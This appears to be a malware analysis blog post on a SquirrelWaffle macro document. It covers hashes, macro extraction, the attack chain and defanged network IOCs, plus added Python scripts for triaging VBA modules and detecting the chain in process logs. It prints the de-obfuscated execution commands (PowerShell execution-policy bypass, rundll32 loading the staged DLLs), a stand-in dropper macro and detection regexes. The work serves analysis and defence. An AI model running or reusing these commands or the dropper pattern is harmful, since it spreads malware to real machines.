- SquirrelWaffle is a malware loader first observed in 2021. It serves as a loader for secondary payloads, which commonly range from banking trojans (e.g. Dridex) to Cobalt Strike.
- It usually leverages a macro to launch a PowerShell script, which launches shellcode in memory, which then downloads and runs the second-stage payload (a DLL) that functions as the loader.
- The most common delivery mechanism is a .doc or .xls file with embedded macro(s).
References
- Netskope: SquirrelWaffle: New Malware Loader Delivering Cobalt Strike and Qakbot
- Trend Micro: SquirrelWaffle Exploits ProxyShell and ProxyLogon to Hijack Email Chains
| Hash Type | File Hash |
|---|---|
| MD5 | 6be56f977b6692fb6ce5f94e110664e3 |
| SHA-1 | f4d5ce35c656e0f156a2ced453a964faabef09fb |
| SHA-256 | ae94cd20505f914bba5e612acb80c429c5606a739c0838e3a5f87bfcc7cc8519 |
We start the analysis of this sample by running TRiD against the file header(s), which confirms that it is indeed a .docx file.
After using olevba and oledump to dump the contents of the embedded OLE streams, we can see a multitude of macros embedded in this sample. After exporting these to a text file, they can be reviewed further.
Most of the macros in this sample are long but harmless; my suspicion is that this is a simple redirection tactic, padding the document with decoy code so that the dropper is harder to spot. If we proceed to the macro named Module3, we can see references to specific Windows directories as well as to a .ps1 file and a .txt file.
The Visual Basic code in the above screenshot has been slightly de-obfuscated by hand. It is important to note that two specific objects are referenced here: var_Object.ttt1.Text and var_Object.ttt2.Text, the Text properties of two controls on the document's form. Fortunately, our OLE stream extraction tools already pulled these out (see below).
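As an added example (not the author's tooling, and not part of the original write-up), here is a small Python triage script for the situation just described: once olevba/oledump have dumped the VBA modules to text, it scores each module on the indicators this analysis keys on (autorun handlers, Environ() path lookups, .ps1/.txt/.dll references, form-control .Text reads, file writes, shell execution) so the long decoy modules sink to the bottom and a Module3-style dropper floats to the top. The module texts are constructed stand-ins that mimic the structure described above, not the sample's actual code, and the indicator names are ours.

```python
"""Rank dumped VBA modules by dropper indicators.

Added example: the module texts below are constructed stand-ins that mimic the
structure described in the write-up (long decoy modules, a dropper that writes
form-control text to %AppData%), not the real sample's code.
"""
import re

# One hit per indicator per module; the names are ours, chosen for readability.
INDICATORS = [
    ("autorun", re.compile(r"\b(AutoOpen|Document_Open|Workbook_Open|Auto_Open|UserForm_Click)\b", re.I)),
    ("env_path", re.compile(r'\bEnviron\s*\(\s*"(AppData|UserProfile|ProgramData|Temp)"', re.I)),
    ("script_ext", re.compile(r"\.(ps1|vbs|js|bat|txt)\b", re.I)),
    ("payload_ext", re.compile(r"\.(dll|exe)\b", re.I)),
    ("form_control", re.compile(r"\.\w+\.Text\b", re.I)),
    ("file_write", re.compile(r"\b(Open\s+.+\s+For\s+Output|Print\s*#|Write\s*#|CreateTextFile|SaveToFile)\b", re.I)),
    ("exec", re.compile(r"\b(Shell|WScript\.Shell|ShellExecute|CreateObject|Run|Exec)\b", re.I)),
    ("lolbin", re.compile(r"\b(rundll32|powershell|regsvr32|mshta)\b|\bcmd\s*/c\b", re.I)),
]


def score_module(code):
    """Return the list of indicator names that fire on one module's source."""
    return [name for name, rx in INDICATORS if rx.search(code)]


def rank_modules(modules):
    """Order modules by indicator count (desc), then by length (asc), so that
    short, dense modules outrank long padding. Returns (name, hits) pairs."""
    scored = [(name, score_module(code), len(code)) for name, code in modules.items()]
    scored.sort(key=lambda t: (-len(t[1]), t[2], t[0]))
    return [(name, hits) for name, hits, _ in scored]


# Constructed stand-ins for the dumped modules (NOT the sample's real macros).
SAMPLE_MODULES = {
    # Two long decoy modules: lots of code, nothing actionable.
    "Module1": "Function a1(x)\n a1 = x * 7 + 3\nEnd Function\n" * 40,
    "Module2": "Sub pad()\n Dim i As Long\n For i = 1 To 1000: Next i\nEnd Sub\n" * 30,
    # Dropper: reads two form controls and writes them out under %AppData%.
    "Module3": (
        "Sub drop()\n"
        "  Dim p As String\n"
        '  p = Environ("AppData") & "\\www.ps1"\n'
        "  Open p For Output As #1\n"
        "  Print #1, var_Object.ttt1.Text\n"
        "  Close #1\n"
        '  Open Environ("AppData") & "\\www.txt" For Output As #2\n'
        "  Print #2, var_Object.ttt2.Text\n"
        "  Close #2\n"
        "End Sub\n"
    ),
    # Trigger: click handler on the form that kicks off the dropper.
    "deutsche": "Private Sub UserForm_Click()\n  Module3.drop\nEnd Sub\n",
}

if __name__ == "__main__":
    for name, hits in rank_modules(SAMPLE_MODULES):
        print(f"{name:10s} {len(hits)}  {', '.join(hits) or '-'}")
```

The point of the length tie-breaker is the redirection tactic itself: when two modules score the same, the shorter one is more likely to be doing real work, and the 1,700-character arithmetic filler ends up at the bottom where it belongs.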
The above shows an obfuscated PowerShell script.
If we de-obfuscate and simplify it, we get the result above, which plainly shows web-client downloads of at least five different DLLs (the download locations are listed under the network IOCs below).
If we proceed to ttt2, we can see a second block of commands, also run through PowerShell, but this one is responsible for executing the DLLs.
It de-obfuscates easily to the commands below. Note that rundll32.exe is handed a bare DLL path with no export name: rundll32 still loads the library, which is enough for the DLL's DllMain to execute before rundll32 reports that it found no entry point.
```text
# Running the previously identified PowerShell script
Powershell Set-ExecutionPolicy Bypass & %AppData%\www.ps1
# Executing the DLLs using Windows' built-in DLL launcher
cmd /c rundll32.exe C:\ProgramData\www1.dll
cmd /c rundll32.exe C:\ProgramData\www2.dll
cmd /c rundll32.exe C:\ProgramData\www3.dll
cmd /c rundll32.exe C:\ProgramData\www4.dll
cmd /c rundll32.exe C:\ProgramData\www5.dll
```
Attack Chain
- The user downloads the .doc file and enables macros.
- The macro named deutsche runs automatically. It sets up an event handler (Private Sub UserForm_Click()) that triggers an action any time the user clicks anywhere in the document.
- The macro named Module3 runs. Module3 resolves the %AppData% directory (%USERPROFILE%\AppData\Roaming), copies text data (PowerShell) from the deutsche OLE stream, and writes it out as a PowerShell script in this newly established staging directory.
- Next, Module3 also copies text data (VBA) from the deutsche OLE stream and writes it out as a VBA script.
- The PowerShell script is responsible for downloading five DLLs and staging them in the C:\ProgramData\ directory.
- The VBA script is then responsible for launching the DLLs via PowerShell by invoking rundll32.exe against each of www1.dll through www5.dll.
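To turn the chain above into something a SOC can act on, here is an added example (not the author's code, and not part of the original post) in Python: it classifies constructed process-creation events, shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine), against the three observable stages of this chain: an Office process spawning a script host, powershell.exe invoked with Set-ExecutionPolicy Bypass on a .ps1 under %AppData%, and rundll32.exe pointed at a DLL under C:\ProgramData. Only the command lines mirror the write-up; the parent/child image paths, the field names and the benign control event are assumptions.

```python
"""Detect the SquirrelWaffle execution chain in process-creation telemetry.

Added example, not the author's code: the events are constructed stand-ins
shaped like Sysmon Event ID 1 (ParentImage / Image / CommandLine). Only the
command lines mirror the write-up; everything else is an assumption.
"""
import re
from dataclasses import dataclass

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}

# Stage 1: ExecutionPolicy bypass plus a .ps1 staged under %AppData% (Roaming).
RE_EXECPOLICY = re.compile(r"set-executionpolicy\s+(bypass|unrestricted)", re.I)
RE_PS1_APPDATA = re.compile(r"(%appdata%|\\appdata\\roaming)\\[^\s\"']+\.ps1\b", re.I)
# Stage 2: rundll32 pointed at a DLL under ProgramData; an optional ",Export" is captured.
RE_RUNDLL_PROGDATA = re.compile(
    r"rundll32(?:\.exe)?\s+\"?(?P<dll>[a-z]:\\programdata\\[^\s\"',]+\.dll)\"?"
    r"(?:\s*,\s*(?P<export>[^\s\"']+))?\s*$",
    re.I,
)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the names of the chain stages one event matches."""
    hits = []
    parent, image, cl = _basename(ev.parent_image), _basename(ev.image), ev.command_line
    if parent in OFFICE_HOSTS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    if image in {"powershell.exe", "pwsh.exe"} and RE_EXECPOLICY.search(cl) and RE_PS1_APPDATA.search(cl):
        hits.append("execpolicy_bypass_ps1_in_appdata")
    m = RE_RUNDLL_PROGDATA.search(cl)
    if m:
        hits.append("rundll32_dll_from_programdata")
        if not m.group("export"):
            # No export named: rundll32 still loads the DLL, so its DllMain runs.
            hits.append("rundll32_no_export")
    return hits


def chain_complete(events):
    """True when the Office -> PowerShell stage and the rundll32 stage both appear."""
    seen = set()
    for ev in events:
        seen.update(classify(ev))
    return {"office_spawns_script_host", "execpolicy_bypass_ps1_in_appdata",
            "rundll32_dll_from_programdata"} <= seen


# Constructed events (NOT real telemetry); command lines follow the write-up.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"Powershell Set-ExecutionPolicy Bypass & %AppData%\www.ps1"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe",
              r"cmd /c rundll32.exe C:\ProgramData\www1.dll"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\ProgramData\www1.dll"),
    # Benign control: a normal rundll32 invocation with a System32 DLL and an export.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{_basename(ev.parent_image):>15} -> {_basename(ev.image):<15} {classify(ev) or '-'}")
    print("chain complete:", chain_complete(SAMPLE_EVENTS))
```

The rundll32 rule is split in two on purpose: a DLL under ProgramData with a named export is worth a look, but a bare DLL path with no export is how this sample runs its payloads, and it is rare in legitimate use, so it deserves its own, higher-severity hit.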
IOCs - Behavioral
| IOC | Description |
|---|---|
| Creation of www.ps1 in %USERPROFILE%\AppData\Roaming | Staging of the PowerShell script that downloads the malicious DLLs. |
| Creation of www.txt in %USERPROFILE%\AppData\Roaming | Copy of the malicious Visual Basic script responsible for launching the DLLs. |
IOCs - Network
| URL | Description |
|---|---|
| hxxps://ghapan[.]com/Kdg73onC3oQ/090921[.]html | Download location for www1.dll |
| hxxps://gruasingenieria[.]pe/LUS1NTVui6/090921[.]html | Download location for www2.dll |
| hxxps://yoowi[.]net/tDzEJ8uVGwdj/130921[.]html | Download location for www3.dll |
| hxxps://chaturanga[.]groopy.com/7SEZBnhMLW/130921[.]html | Download location for www4.dll |
| hxxps://lotolands[.]com/JtaTAt4Ej/130921[.]html | Download location for www5.dll |
IOCs - Endpoint
| IOC | Description |
|---|---|
| ae94cd20505f914bba5e612acb80c429c5606a739c0838e3a5f87bfcc7cc8519 | SHA-256 of the maldoc (dropper) |